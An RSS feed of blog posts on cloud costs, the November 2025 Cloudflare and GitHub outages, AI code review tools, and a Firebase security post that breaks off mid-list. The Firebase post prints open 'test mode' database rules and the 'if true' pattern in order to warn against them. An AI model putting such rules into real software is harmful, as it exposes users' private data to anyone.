<p>Provisioning a server takes minutes on AWS. Buying hardware takes weeks. Early-stage startups optimize for speed, not cost.</p>
<p><strong>No upfront capital</strong></p>
<p>Buying servers requires cash. AWS is OpEx, not CapEx. Startups short on cash choose monthly bills over hardware purchases.</p>
<p><strong>Scaling flexibility</strong></p>
<p>Need 10x capacity for a product launch? Spin up instances. Traffic drops after? Scale down. With owned hardware, you're stuck with excess capacity.</p>
<p><strong>Managed services</strong></p>
<p>RDS handles database backups and failover. S3 handles file storage. Lambda handles compute. No DevOps engineer needed (initially).</p>
<p><strong>Investor expectations</strong></p>
<p>VCs expect startups to use cloud infrastructure. Saying "we run on bare metal" raises questions about scalability.</p>
<p><strong>Developer preference</strong></p>
<p>Engineers want AWS/GCP/Azure on their resume. Managing physical servers feels outdated.</p>
<h1 id="heading-when-cloud-costs-break-startups">When Cloud Costs Break Startups</h1>
<p>The breaking point comes when infrastructure costs exceed engineering salaries.</p>
<p><strong>Real example</strong> (anonymised):</p>
<p>SaaS company, $2M ARR, 15 employees</p>
<ul>
<li><p>Engineering team (5 people): $750k/year</p>
</li>
<li><p>AWS bill: $960k/year</p>
</li>
</ul>
<p>Infrastructure costs more than the team building the product.</p>
<p>Gross margin: 52% (should be 80%+ for SaaS) Path to profitability: Unclear because AWS costs grow faster than revenue</p>
<h1 id="heading-the-margin-destruction">The Margin Destruction</h1>
<p>Typical SaaS metrics:</p>
<ul>
<li><p>Target gross margin: 80%+</p>
</li>
<li><p>Customer acquisition cost: $500-2,000</p>
</li>
<li><p>Lifetime value: $5,000-20,000</p>
</li>
</ul>
<p>When cloud costs consume 40-50% of revenue:</p>
<ul>
<li><p>Gross margin: 50-60%</p>
</li>
<li><p>Less capital for growth</p>
</li>
<li><p>Longer path to profitability</p>
</li>
<li><p>Less attractive to investors/acquirers</p>
</li>
</ul>
<p>Cloud vendors effectively tax your revenue at 30-50%. And the tax rate increases with scale.</p>
<h1 id="heading-repatriation">Repatriation</h1>
<p>Companies are moving off cloud to save money.</p>
<p><strong>37signals (Basecamp, Hey)</strong>:</p>
<p>Moved off cloud, saved $7 million over 5 years. Bought hardware, colocated in data centers. Margins improved dramatically.</p>
<p><strong>Dropbox</strong>:</p>
<p>Moved storage off AWS to owned infrastructure. Saved $75 million over 2 years.</p>
<p><strong>Discord</strong>:</p>
<p>Moved from MongoDB Atlas to ScyllaDB on owned hardware. Saved millions annually while improving performance.</p>
<p>The pattern is that companies hit scale, realise cloud costs are destroying margins, migrate to owned infrastructure.</p>
<h1 id="heading-migration">Migration</h1>
<p>"Just move off cloud" sounds simple. It's not.</p>
<p><strong>Vendor lock-in</strong></p>
<p>Built with AWS Lambda, API Gateway, DynamoDB, and SQS? That's AWS-specific. Migration requires rewriting.</p>
<p><strong>Operational complexity</strong></p>
<p>Moving to owned infrastructure means:</p>
<ul>
<li><p>Managing hardware failures</p>
</li>
<li><p>Handling network issues</p>
</li>
<li><p>Maintaining security</p>
</li>
<li><p>Scaling manually</p>
</li>
<li><p>Hiring DevOps/SRE team</p>
</li>
</ul>
<p><strong>Upfront costs</strong></p>
<p>Buying servers and colocation contracts requires capital. Startups operating on VC runway don't have it.</p>
<p><strong>Risk</strong></p>
<p>Cloud providers have SLAs. Owned infrastructure means you're responsible for uptime. One mistake costs customers.</p>
<p><strong>Time</strong></p>
<p>Migration takes months. Engineering time spent migrating isn't spent building features. Opportunity cost is massive.</p>
<h1 id="heading-what-i-do">What I Do</h1>
<p>For early-stage projects: I use cloud. Speed matters.</p>
<p>For projects with revenue: I run numbers monthly. When cloud costs hit 15-20% of revenue, I start planning migration.</p>
<p>For established projects: Hybrid approach. Owned infrastructure for predictable workloads, cloud for spikes and backups.</p>
<p>I don't pay AWS for bandwidth that's free elsewhere. I don't pay for managed services I can run myself. I don't commit to reserved instances.</p>
<h1 id="heading-final-thoughts">Final Thoughts</h1>
<p>Cloud infrastructure is a tool. It's not a requirement.</p>
<p>Early on, cloud makes sense: fast provisioning, no upfront costs, managed services. The cost is worth the speed.</p>
<p>At scale, cloud is a tax on your revenue. Companies with mature products running on AWS are often paying 10-15x what the same infrastructure costs elsewhere.</p>
<p>The migration path exists. It's just painful, which is exactly why cloud vendors designed it that way.</p>
<p>If your AWS bill exceeds your engineering salaries, you have a problem. If your gross margins are below 70% because of infrastructure costs, you're building a less profitable business than necessary.</p>
<p>Cloud vendors have successfully convinced the industry that expensive infrastructure is inevitable. It's not. It's a choice.</p>
<p>Choose deliberately.</p>
]]></content:encoded></item><item><title><![CDATA[When Cloudflare and GitHub Go Down on the Same Day: The Internet's Fragile Foundation]]></title><description><![CDATA[November 18, 2025: Cloudflare goes down at 7am ET. X, ChatGPT, Spotify, Zoom, and thousands of other sites become unreachable. 20% of the internet stops working.
Four hours later, Cloudflare comes back up.
Then GitHub goes down. Git operations fail g...]]></description><link>https://blog.jacobalcock.co.uk/when-cloudflare-and-github-go-down-on-the-same-day-the-internets-fragile-foundation</link><guid isPermaLink="true">https://blog.jacobalcock.co.uk/when-cloudflare-and-github-go-down-on-the-same-day-the-internets-fragile-foundation</guid><category><![CDATA[Outage]]></category><category><![CDATA[cloudflare]]></category><category><![CDATA[GitHub]]></category><category><![CDATA[Developer]]></category><dc:creator><![CDATA[Jacob Alcock]]></dc:creator><pubDate>Thu, 20 Nov 2025 22:02:07 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1763638186827/8956b1ba-7567-461d-bba2-19f5e581366d.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>November 18, 2025: Cloudflare goes down at 7am ET. X, ChatGPT, Spotify, Zoom, and thousands of other sites become unreachable. 20% of the internet stops working.</p>
<p>Four hours later, Cloudflare comes back up.</p>
<p>Then GitHub goes down. Git operations fail globally. Developers can't push code. CI/CD pipelines break. Deployments stop.</p>
<p>Two critical internet infrastructure providers failing on the same day. Millions of users affected. Billions in productivity lost.</p>
<p>This isn't a coincidence. It's the inevitable result of an internet built on a handful of single points of failure.</p>
<h1 id="heading-what-happened-cloudflare"><strong>What Happened: Cloudflare</strong></h1>
<p><strong>The Outage</strong>:</p>
<ul>
<li><p>Started: ~11:30 GMT / 7:00 AM ET</p>
</li>
<li><p>Resolved: 14:30 UTC (~4 hour duration)</p>
</li>
<li><p>Cause: Auto-generated configuration file grew beyond expected size, crashed threat management system</p>
</li>
<li><p>Impact: Sites returning 500 errors, timeouts, Cloudflare error pages</p>
</li>
</ul>
<p><strong>Sites Affected</strong>:</p>
<ul>
<li><p>X (Twitter)</p>
</li>
<li><p>ChatGPT</p>
</li>
<li><p>Claude</p>
</li>
<li><p>Spotify</p>
</li>
<li><p>Zoom</p>
</li>
<li><p>Canva</p>
</li>
<li><p>Amazon (some services)</p>
</li>
<li><p>Thousands more</p>
</li>
</ul>
<p>Even Downdetector - the site people visit to check if other sites are down - went down.</p>
<p><strong>Root Cause</strong>:</p>
<p>Cloudflare CTO Dane Knecht explained the failure:</p>
<blockquote>
<p>"The root cause of the outage was a configuration file that is automatically generated to manage threat traffic. The file grew beyond an expected size of entries and triggered a crash in the software system that handles traffic for a number of Cloudflare's services. The Cloudflare team was able to diagnose the issue and revert to a previous version of the file which restored services as of 14:30 UTC. There is no evidence of an attack or malicious activity causing the issue."</p>
</blockquote>
<p>Translation: An auto-generated config file for threat management grew too large. The software couldn't handle it. It crashed. That crash cascaded through Cloudflare's network. Everything broke.</p>
<p>Not an attack. Not malicious. Just a config file that grew beyond expected size and took down 20% of the internet.</p>
<h1 id="heading-what-happened-github"><strong>What Happened: GitHub</strong></h1>
<p><strong>Hours later, same day</strong>:</p>
<p>GitHub Status: "Git Operations is experiencing degraded availability."</p>
<p>Users seeing:</p>
<pre><code class="lang-plaintext">fatal: Could not read from remote repository.
Please make sure you have the correct access rights
and the repository exists.
</code></pre>
<p><strong>Impact</strong>:</p>
<ul>
<li><p>Can't clone repos</p>
</li>
<li><p>Can't push code</p>
</li>
<li><p>Can't pull updates</p>
</li>
<li><p>CI/CD pipelines blocked</p>
</li>
<li><p>Deployments stopped</p>
</li>
</ul>
<p>Multiple accounts, multiple orgs, multiple repos. Global impact.</p>
<p>Two critical infrastructure providers. Same day. Unrelated failures.</p>
<h1 id="heading-the-single-point-of-failure"><strong>The Single Point of Failure</strong></h1>
<p><strong>Cloudflare powers 20% of all websites</strong></p>
<p>Think about that. One company. One fifth of the internet.</p>
<p>When Cloudflare crashes, 20% of the web becomes unreachable. Not because those sites crashed. Because the infrastructure protecting and routing to those sites crashed.</p>
<p><strong>GitHub hosts the majority of open source and enterprise code</strong></p>
<p>Most companies use GitHub for source control. When GitHub goes down:</p>
<ul>
<li><p>Developers can't work</p>
</li>
<li><p>Deployments stop</p>
</li>
<li><p>CI/CD breaks</p>
</li>
<li><p>Open source grinds to a halt</p>
</li>
</ul>
<p><strong>The consolidation problem</strong>:</p>
<p>The internet runs on a handful of companies:</p>
<ul>
<li><p>Cloudflare (CDN, DDoS protection, DNS)</p>
</li>
<li><p>AWS (cloud infrastructure)</p>
</li>
<li><p>Microsoft Azure (cloud infrastructure)</p>
</li>
<li><p>Google Cloud (cloud infrastructure)</p>
</li>
<li><p>GitHub (source control)</p>
</li>
<li><p>Fastly (CDN)</p>
</li>
</ul>
<p>When any of these have problems, significant chunks of the internet break.</p>
<h1 id="heading-why-this-keeps-happening"><strong>Why This Keeps Happening</strong></h1>
<p><strong>Within one month alone</strong>:</p>
<ul>
<li><p>AWS outage (October 20)</p>
</li>
<li><p>Microsoft Azure outage (days after AWS)</p>
</li>
<li><p>Cloudflare outage (November 18)</p>
</li>
<li><p>GitHub outage (November 18, same day as Cloudflare)</p>
</li>
</ul>
<p>Four major infrastructure providers. Four outages. One month.</p>
<p>Professor David Choffnes (Northeastern University):</p>
<blockquote>
<p>"We now have AWS, Azure and Cloudflare outages in the span of a month. That's a very large portion of the biggest cloud providers in the world. It has not been the case that we have seen major outages like this in a short period of time."</p>
</blockquote>
<p>This isn't normal. But it's becoming normalized.</p>
<h1 id="heading-why-companies-rely-on-these-services"><strong>Why Companies Rely on These Services</strong></h1>
<p><strong>Cost</strong></p>
<p>Building your own CDN: Millions in infrastructure, operations, staff.</p>
<p>Using Cloudflare: Free tier or $20-200/month.</p>
<p>Building your own Git infrastructure: Servers, backups, reliability engineering.</p>
<p>Using GitHub: $0-$21/user/month.</p>
<p>The economics are obvious.</p>
<p><strong>Expertise</strong></p>
<p>Cloudflare has 330 data centers globally. 13,000 networks directly connected.</p>
<p>Most companies can't build that. Even if they could, it would cost more than using Cloudflare.</p>
<p><strong>DDoS protection</strong></p>
<p>Cloudflare's primary value: protecting sites from DDoS attacks.</p>
<p>DDoS attacks can cost millions in downtime. Cloudflare prevents them for $20/month.</p>
<p>But when Cloudflare goes down, sites become unreachable anyway. The irony is thick.</p>
<p><strong>Network effects</strong></p>
<p>GitHub has the code. Developers use GitHub. Companies hire developers who know GitHub. Everyone uses GitHub.</p>
<p>Switching to GitLab, Bitbucket, or self-hosted Git means retraining, migration cost, and losing ecosystem integrations.</p>
<p>Lock-in is real.</p>
<h1 id="heading-the-latent-bug-problem"><strong>The Latent Bug Problem</strong></h1>
<p>Cloudflare's outage was caused by a "latent bug" - a bug that existed in production but wasn't detected until a specific condition triggered it.</p>
<p><strong>How this happens</strong>:</p>
<ol>
<li><p>Code has bug</p>
</li>
<li><p>Bug doesn't manifest under normal conditions</p>
</li>
<li><p>Bug passes testing</p>
</li>
<li><p>Bug ships to production</p>
</li>
<li><p>Months/years pass</p>
</li>
<li><p>Configuration change or traffic pattern triggers bug</p>
</li>
<li><p>Service crashes</p>
</li>
<li><p>Cascading failure takes down everything</p>
</li>
</ol>
<p><strong>Why testing doesn't catch it</strong>:</p>
<p>Testing simulates normal conditions. Latent bugs manifest under abnormal conditions - edge cases, specific configurations, unusual traffic patterns.</p>
<p>You can't test for every possible scenario. Some bugs hide until production triggers them.</p>
<p><strong>The cascade problem</strong>:</p>
<p>Bug in bot mitigation service crashed that service. That service is critical to other services. Those services crashed. Those services were critical to more services. Cascade.</p>
<p>Modern distributed systems have interdependencies. One failure propagates everywhere.</p>
<h1 id="heading-the-apology"><strong>The Apology</strong></h1>
<p>Cloudflare CTO Dane Knecht posted on LinkedIn:</p>
<blockquote>
<p>"I won't mince words: earlier today we failed our customers and the broader Internet when a problem in Cloudflare's network impacted large amounts of traffic that rely on us. The sites, businesses, and organizations that rely on Cloudflare depend on us being available and I apologize for the impact that we caused... That issue, impact it caused, and time to resolution is unacceptable. Work is already underway to make sure it does not happen again, but I know it caused real pain today. The trust our customers place in us is what we value the most and we are going to do what it takes to earn that back."</p>
</blockquote>
<p>Cloudflare's formal statement:</p>
<blockquote>
<p>"We apologise to our customers and the Internet in general for letting you down today. Given the importance of Cloudflare's services, any outage is unacceptable."</p>
</blockquote>
<p>Cloudflare's importance makes outages unacceptable. But outages will happen anyway. The apology is sincere. It also doesn't prevent the next outage.</p>
<h1 id="heading-why-this-wont-get-fixed"><strong>Why This Won't Get Fixed</strong></h1>
<p><strong>No alternative exists</strong></p>
<p>You can't avoid Cloudflare by using... what? Build your own global CDN?</p>
<p>For most companies, that's not realistic.</p>
<p><strong>Diversification is expensive</strong></p>
<p>Using multiple CDN providers means:</p>
<ul>
<li><p>Double the cost</p>
</li>
<li><p>Complex failover logic</p>
</li>
<li><p>More things to manage</p>
</li>
<li><p>Still vulnerable if primary provider fails and failover is slow</p>
</li>
</ul>
<p><strong>The market rewards consolidation</strong></p>
<p>Cloudflare wins because they're the biggest, cheapest, most feature-rich option.</p>
<p>Smaller competitors can't match their scale or price.</p>
<p>Market concentration increases. Single point of failure risk increases.</p>
<p><strong>Regulatory inaction</strong></p>
<p>Governments could regulate critical internet infrastructure. Require redundancy, disaster recovery, testing standards.</p>
<p>They don't. Cloudflare is a private company. Regulators don't care until something catastrophic happens.</p>
<p><strong>Cost of downtime vs cost of prevention</strong></p>
<p>Cloudflare's 4-hour outage cost the internet billions.</p>
<p>But Cloudflare's cost was minimal:</p>
<ul>
<li><p>No SLA violations for most customers (free tier has no SLA)</p>
</li>
<li><p>Stock down 3%, recovered quickly</p>
</li>
<li><p>No regulatory penalty</p>
</li>
<li><p>No lawsuits with teeth</p>
</li>
</ul>
<h1 id="heading-the-github-timing"><strong>The GitHub Timing</strong></h1>
<p>GitHub going down the same day as Cloudflare is probably coincidence.</p>
<p>But it illustrates the problem: we have no redundancy.</p>
<p>When GitHub is down, there's no "backup GitHub." You just wait.</p>
<p>When Cloudflare is down, there's no failover. Sites just show errors.</p>
<p><strong>Why no backup</strong>:</p>
<p>Maintaining GitHub failover means:</p>
<ul>
<li><p>Mirroring all repos to another provider</p>
</li>
<li><p>Keeping mirrors in sync</p>
</li>
<li><p>Switching workflows when GitHub is down</p>
</li>
<li><p>Training developers on two systems</p>
</li>
</ul>
<p>Cost and complexity aren't worth it for most companies. So they accept the risk.</p>
<h1 id="heading-the-awsazurecloudflare-trifecta"><strong>The AWS/Azure/Cloudflare Trifecta</strong></h1>
<p>In one month:</p>
<ul>
<li><p>AWS outage knocked out 1,000+ sites</p>
</li>
<li><p>Azure outage followed days later</p>
</li>
<li><p>Cloudflare outage took down 20% of the internet</p>
</li>
</ul>
<p>Professor Timothy Edgar (Brown University):</p>
<blockquote>
<p>"This is another alarming example of how dependent we have become on critical internet infrastructure, and how little the government is doing to hold big companies accountable."</p>
</blockquote>
<p><strong>The consolidation timeline</strong>:</p>
<p><strong>2010</strong>: Many CDN providers, diverse cloud infrastructure <strong>2015</strong>: Market consolidating around AWS, Cloudflare, Azure <strong>2020</strong>: Three companies dominate cloud infrastructure <strong>2025</strong>: Internet runs on a handful of companies; outages affect billions</p>
<p>Consolidation was economically rational for companies. Disastrous for internet resilience.</p>
<h1 id="heading-the-irony"><strong>The Irony</strong></h1>
<p>Cloudflare's primary product: DDoS protection. Keeping sites online during attacks.</p>
<p>Cloudflare's outage: Made sites unreachable. Same result as DDoS.</p>
<p>The tool meant to prevent downtime caused downtime.</p>
<p><strong>From Alp Toker (NetBlocks)</strong>:</p>
<blockquote>
<p>"What's striking is how much of the internet has had to hide behind Cloudflare infrastructure to avoid denial of service attacks in recent years. [It] has become one of the internet's largest single points of failure."</p>
</blockquote>
<p>We built internet infrastructure to prevent attacks from taking down sites.</p>
<p>Instead we created infrastructure that can take down sites without any attack.</p>
<h1 id="heading-the-truth"><strong>The Truth</strong></h1>
<p>The internet is fragile because it's consolidated.</p>
<p>20% of websites depend on one company. Most code is hosted by one company. Most cloud infrastructure is split between three companies.</p>
<p>When any of these fail, significant chunks of the internet stop working.</p>
<p>This happens because:</p>
<ul>
<li><p>Consolidation is economically efficient</p>
</li>
<li><p>Building alternatives is expensive</p>
</li>
<li><p>Network effects create lock-in</p>
</li>
<li><p>Regulation doesn't require resilience</p>
</li>
</ul>
<p>November 18, 2025 had two major outages. Same day. Unrelated causes. Both critical infrastructure.</p>
<p>This will happen again. More frequently. Because the internet's foundation is built on single points of failure, and nobody with the power to fix it has an incentive to do so.</p>
<p><strong>What we're told</strong>: "Incidents are unacceptable. We're working to prevent them."</p>
<p><strong>What will happen</strong>: More incidents. More apologies. No structural change.</p>
<p>The internet runs on a handful of companies. When they fail, the internet fails.</p>
<p>We've optimized for cost and convenience. We've sacrificed resilience.</p>
<p>November 18 was a reminder of that trade-off.</p>
<p>The next reminder is coming. We just don't know when.</p>
<hr />
<p><strong>Timeline</strong>:</p>
<ul>
<li><p><strong>7:00 AM ET / 11:30 GMT</strong>: Cloudflare outage begins</p>
</li>
<li><p><strong>10:30 AM ET / 14:30 UTC</strong>: Cloudflare services restored</p>
</li>
<li><p><strong>3:39 PM ET</strong>: GitHub Git operations begin failing</p>
</li>
<li><p><strong>Same day</strong>: Two critical infrastructure providers down, millions affected</p>
</li>
</ul>
<p>The internet's fragility has never been clearer.</p>
]]></content:encoded></item><item><title><![CDATA[AI Code Review Tools Are Making Code Worse]]></title><description><![CDATA[AI code review tools promise to catch bugs before they hit production. In practice, they're creating a false sense of security while making it easier to ship bad code.
The problem isn't that AI code review doesn't work at all. It's that it works just...]]></description><link>https://blog.jacobalcock.co.uk/ai-code-review-tools-are-making-code-worse</link><guid isPermaLink="true">https://blog.jacobalcock.co.uk/ai-code-review-tools-are-making-code-worse</guid><category><![CDATA[AI]]></category><category><![CDATA[coding]]></category><category><![CDATA[Developer]]></category><dc:creator><![CDATA[Jacob Alcock]]></dc:creator><pubDate>Fri, 14 Nov 2025 23:04:36 GMT</pubDate><content:encoded><![CDATA[<p>AI code review tools promise to catch bugs before they hit production. In practice, they're creating a false sense of security while making it easier to ship bad code.</p>
<p>The problem isn't that AI code review doesn't work at all. It's that it works just well enough to be dangerous.</p>
<h1 id="heading-false-security">False Security</h1>
<p>When you have an AI tool that flags 20 issues in a PR, and 18 of them are noise, developers learn to ignore them. The two real issues get lost in the noise. This is worse than no automated review at all.</p>
<p>Traditional code review works because there's accountability. A human reviewer stakes their reputation on approving code. They know if they approve something that breaks production, it reflects on them. AI tools have no such incentive.</p>
<p>The result: developers treat AI code review as a checkbox. "The bot approved it" becomes justification for merging without actual human review.</p>
<h1 id="heading-what-ai-code-review-actually-catches">What AI Code Review Actually Catches</h1>
<ul>
<li><p><strong>Linting issues</strong> - things your IDE already flagged</p>
</li>
<li><p><strong>Style violations</strong> - whitespace, formatting, naming conventions</p>
</li>
<li><p><strong>Simple pattern matching</strong> - detecting banned functions or obvious anti-patterns</p>
</li>
<li><p><strong>Surface-level type errors</strong> - things TypeScript/mypy would catch anyway</p>
</li>
</ul>
<p>What it doesn't catch:</p>
<ul>
<li><p><strong>Logic errors</strong> - off-by-one errors, incorrect conditionals, race conditions</p>
</li>
<li><p><strong>Security vulnerabilities</strong> - SQL injection, XSS, authentication bypasses (unless they match exact training patterns)</p>
</li>
<li><p><strong>Architecture issues</strong> - this function shouldn't exist, wrong abstraction, tight coupling</p>
</li>
<li><p><strong>Business logic bugs</strong> - the code does what it says, but what it says is wrong</p>
</li>
<li><p><strong>Context-dependent problems</strong> - this change breaks an assumption made elsewhere</p>
</li>
</ul>
<p>The entire value of code review comes from catching the second category. AI tools are optimised for the first.</p>
<h1 id="heading-training-data">Training Data</h1>
<p>AI code review tools are trained on existing codebases. Existing codebases are full of bugs. The model learns to accept buggy code because that's what it was trained on.</p>
<p>The model has no way to know if code it was trained on later caused production incidents. It treats "code that was merged" as "good code" when in reality it just means "code that someone approved."</p>
<p>This is the same fundamental flaw as <a target="_blank" href="https://blog.jacobalcock.co.uk/model-collapse-the-ai-feedback-loop-problem-nobody-wants-to-talk-about">LLM model collapse</a>. The training data is contaminated with the exact problems the tool is supposed to prevent.</p>
<h1 id="heading-alert-fatigue">Alert Fatigue</h1>
<p>I've seen AI code review tools flag the following as "security issues":</p>
<ul>
<li><p>Using <code>JSON.parse()</code> (flagged as potential RCE)</p>
</li>
<li><p>Any SQL query (flagged as potential injection, even with parameterised queries)</p>
</li>
<li><p><code>eval()</code> in a test file</p>
</li>
<li><p><code>setTimeout</code> with a variable delay (flagged as timing attack)</p>
</li>
</ul>
<p>Every single one was a false positive. When developers see 15 false positives per PR, they stop reading the AI's feedback. The one real SQL injection vulnerability gets merged because nobody takes the bot seriously anymore.</p>
<h1 id="heading-speed">Speed</h1>
<p>AI code review tools are marketed on speed. "Get feedback in seconds, not hours!" This optimises for the wrong metric.</p>
<p>Code review isn't slow because humans type slowly. It's slow because understanding context takes time. Reading the related code, understanding the business logic, thinking through edge cases - none of this can be rushed.</p>
<p>AI tools optimise for fast feedback. Developers optimise for getting code merged. The combination produces code that passes automated checks but doesn't actually work correctly.</p>
<h1 id="heading-economics">Economics</h1>
<p>Companies buy AI code review tools for two reasons:</p>
<ol>
<li><p><strong>To reduce headcount</strong> - fewer senior engineers needed if AI does code review</p>
</li>
<li><p><strong>To ship faster</strong> - remove the bottleneck of waiting for human reviewers</p>
</li>
</ol>
<p>Both reasons directly conflict with code quality. You're replacing experienced judgment with pattern matching, and adding pressure to merge quickly.</p>
<p>The incentives are clear: vendors sell speed and cost reduction, companies buy those metrics, and code quality suffers. Nobody's incentive is aligned with "catch more bugs."</p>
<h1 id="heading-what-works">What Works</h1>
<p>The solution isn't better AI code review. It's better human code review.</p>
<ul>
<li><p><strong>Pair programming</strong> - real-time review catches issues before they're even committed</p>
</li>
<li><p><strong>Small PRs</strong> - easier to review thoroughly, less likely to hide bugs</p>
</li>
<li><p><strong>Domain expertise</strong> - reviewers who understand the system, not just the syntax</p>
</li>
<li><p><strong>Accountability</strong> - reviewers whose names are attached to what they approve</p>
</li>
<li><p><strong>Time</strong> - allowing reviewers to actually think through the changes</p>
</li>
</ul>
<p>None of these scale as well as AI code review. That's the point. Code review shouldn't scale. If you're merging so much code that human review is a bottleneck, you have a process problem, not a tooling problem.</p>
<h1 id="heading-the-truth">The Truth</h1>
<p>AI code review tools exist because companies want to ship faster with fewer experienced engineers. The tools work well enough to justify the purchase, but not well enough to actually improve code quality.</p>
<p>What you get is:</p>
<ul>
<li><p>Junior developers who think the AI caught all the issues</p>
</li>
<li><p>Senior developers who ignore the AI because of alert fatigue</p>
</li>
<li><p>Management who sees "100% of PRs reviewed by AI" as a quality metric</p>
</li>
<li><p>Production incidents that would have been caught by a human reviewer</p>
</li>
</ul>
<p>The feedback loop ensures this gets worse over time. AI-approved code trains the next version of the AI. Bad code becomes the baseline.</p>
<h1 id="heading-what-i-do">What I Do</h1>
<p>I don't use AI code review tools on projects I care about. I use:</p>
<ul>
<li><p><strong>Linters</strong> - for style and simple pattern matching (what AI code review actually does well)</p>
</li>
<li><p><strong>Static analysis</strong> - language-specific tools that understand semantics, not just syntax</p>
</li>
<li><p><strong>Human reviewers</strong> - people who understand the system and business logic</p>
</li>
<li><p><strong>Tests</strong> - including the weird edge cases AI tools never think to check</p>
</li>
</ul>
<p>Is it slower? Yes. Does it catch more bugs? Absolutely.</p>
<p>The industry has spent the last decade optimising for development speed. We've gotten very fast at shipping bugs to production. Maybe it's time to optimise for correctness instead.</p>
<h1 id="heading-final-thoughts">Final Thoughts</h1>
<p>AI code review isn't useless. It's worse than useless - it creates the illusion of thorough review while making it easier to ship bad code.</p>
<p>The problem isn't the technology. It's that the technology is being used to replace judgment with pattern matching, and accountability with automation.</p>
<p>Companies don't want to admit they're using AI code review to cut costs and ship faster. They frame it as "augmenting" human reviewers. In practice, it's replacing them. And the code quality shows it.</p>
<p>The fix requires admitting that code review is valuable because it's slow and thoughtful, not despite it. AI tools optimised for speed and cost will never provide the same value as a senior engineer who actually understands the system.</p>
<p>But that requires paying senior engineers and accepting slower ship times. So instead, we'll keep using AI code review, keep shipping bugs, and keep wondering why code quality is declining.</p>
<p>The tools aren't making code better. They're just making it easier to pretend we reviewed it.</p>
]]></content:encoded></item><item><title><![CDATA[Test Mode to Production with Firebase]]></title><description><![CDATA[Firebase has a "test mode" that allows anyone to read and write your entire database. Developers enable it during development and forget to change it before deploying to production.
This isn't a rare mistake. It's constant. Millions of Firebase datab...]]></description><link>https://blog.jacobalcock.co.uk/test-mode-to-production-with-firebase</link><guid isPermaLink="true">https://blog.jacobalcock.co.uk/test-mode-to-production-with-firebase</guid><category><![CDATA[Firebase]]></category><category><![CDATA[Security]]></category><dc:creator><![CDATA[Jacob Alcock]]></dc:creator><pubDate>Thu, 13 Nov 2025 07:53:34 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1762708258059/b187c513-7594-4a4a-b243-da0e1d267803.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Firebase has a "test mode" that allows anyone to read and write your entire database. Developers enable it during development and forget to change it before deploying to production.</p>
<p>This isn't a rare mistake. It's constant. Millions of Firebase databases are running wide open right now because someone clicked "test mode" and never looked back.</p>
<h1 id="heading-the-default">The Default</h1>
<p>When you create a Cloud Firestore or Realtime Database instance in the Firebase console, you get two options:</p>
<ul>
<li><p><strong>Locked mode</strong>: Deny all access</p>
</li>
<li><p><strong>Test mode</strong>: Allow all access for a month</p>
</li>
</ul>
<p>Test mode gives you these rules:</p>
<p><strong>Cloud Firestore</strong>:</p>
<pre><code class="lang-plaintext">rules_version = '2';
service cloud.firestore {
  match /databases/{database}/documents {
    match /{document=**} {
      allow read, write: if request.time &lt; timestamp.date(2025, 12, 1);
    }
  }
}
</code></pre>
<p><strong>Realtime Database</strong>:</p>
<pre><code class="lang-plaintext">{
  "rules": {
    ".read": "now &lt; 1701388800000",
    ".write": "now &lt; 1701388800000"
  }
}
</code></pre>
<p>Notice the time condition. Test mode is supposed to lock down after 30 days. In theory, developers should update their rules before the deadline.</p>
<p>In practice, that doesn't happen.</p>
<h1 id="heading-what-actually-happens">What Actually Happens</h1>
<p>Developers enable test mode to get started quickly. They build their app, test functionality, add features. The 30-day deadline approaches.</p>
<p>Firebase sends a warning email: "Your security rules will expire soon."</p>
<p>In insecure cases developers do one of three things:</p>
<ol>
<li><p><strong>Ignore it</strong> - the email goes to spam or gets lost</p>
</li>
<li><p><strong>Extend the deadline</strong> - click the "extend for 30 days" button in the console</p>
</li>
<li><p><strong>Ship insecure rules</strong> - remove the time restriction and just leave <code>if true</code></p>
</li>
</ol>
<p>Option 3 is the disaster. Once you remove the time restriction, your database is permanently wide open. No more warnings. No forced deadline. Just a production database that anyone can read and write.</p>
<h1 id="heading-the-tea-app">The Tea App</h1>
<p>The Tea app had 50+ million users. Their Firestore database was completely open. No authentication required. Anyone could:</p>
<ul>
<li><p>Read all user data (emails, phone numbers, locations)</p>
</li>
<li><p>Modify user records</p>
</li>
<li><p>Delete accounts</p>
</li>
<li><p>Access private messages</p>
</li>
<li><p>Extract the entire database</p>
</li>
</ul>
<p>The breach was discovered by security researchers doing routine scans. They found the database, extracted everything, and disclosed it responsibly. Tea fixed it. But the damage was done.</p>
<h1 id="heading-why-this-keeps-happening">Why This Keeps Happening</h1>
<p><strong>Firebase makes it easy to be insecure</strong></p>
<p>Test mode is the default suggestion. "Get started quickly!" Locked mode requires you to write rules immediately. Developers often choose the path of least resistance.</p>
<p><strong>Security rules are separate from application logic</strong></p>
<p>Your app code is version controlled, code reviewed, tested. Your Firebase rules are edited in a web console or deployed separately. They don't get the same scrutiny.</p>
<p><strong>No forced security checks</strong></p>
<p>Firebase doesn't prevent you from deploying insecure rules. You can literally ship <code>allow read, write: if true;</code> to production. No warnings, no confirmation dialogs, no "are you sure?"</p>
<p><strong>Developers don't understand the risk</strong></p>
<p>Many developers treat Firebase like a backend-as-a-service that handles security for them. They don't realise the rules they write ARE the security. If the rules say "allow access to everyone," that's exactly what happens.</p>
<p><strong>Deadlines and shipping pressure</strong></p>
<p>Implementing proper security rules takes time. Learning the rules language, understanding data access patterns, testing edge cases. When the deadline is tomorrow, <code>if true</code> ships.</p>
<h1 id="heading-economics">Economics</h1>
<p>Firebase's business model is based on usage. More apps using Firebase = more revenue. Making security easy would require:</p>
<ul>
<li><p>Better defaults</p>
</li>
<li><p>Forced security reviews before production</p>
</li>
<li><p>Automated vulnerability scanning</p>
</li>
<li><p>Warnings for obviously insecure patterns</p>
</li>
</ul>
<p>All of this adds friction. Friction reduces adoption. Firebase optimises for growth, not security.</p>
<p>Google could force developers to implement secure rules before going to production. They don't. Because the developer who can't figure out security rules will choose a different platform.</p>
<h1 id="heading-impact">Impact</h1>
<p>I've found hundreds of open Firebase databases during penetration tests and security research. The pattern is consistent:</p>
<p><strong>Open Firestore/RTDB instances containing</strong>:</p>
<ul>
<li><p>User credentials (emails, phone numbers, addresses)</p>
</li>
<li><p>Payment information (stored credit cards, transaction history)</p>
</li>
<li><p>Private messages and chat logs</p>
</li>
<li><p>Location data and tracking information</p>
</li>
<li><p>API keys and service credentials</p>
</li>
